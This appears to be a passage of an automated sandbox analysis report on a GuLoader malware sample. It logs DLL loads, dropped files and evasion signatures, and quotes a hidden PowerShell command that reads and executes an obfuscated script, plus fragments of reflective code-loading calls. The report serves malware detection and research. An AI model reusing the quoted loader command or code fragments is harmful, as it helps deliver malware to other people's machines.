Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 7uY105UTJU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000008.00000002.3373713233.000000000400B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unisepalous $Purkene $Muircock), (Morbus @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hairstyles = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ten
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spunk75)), $Rehumanisation).DefineDynamicModule($Algevkst, $false).DefineType($Skamferingens, $faderskikkelsernes, [System.MulticastDe

Suspicious powershell command line found

Source: C:\Users\user\Desktop\7uY105UTJU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) "
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) "			Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe	File created: C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\syrians.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\syrians.exe

API/Special instruction interceptor: Address: 4264DDC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4896			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4857			Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2740	Thread sleep time: -11068046444225724s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\syrians.exe TID: 3520	Thread sleep time: -190000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\syrians.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
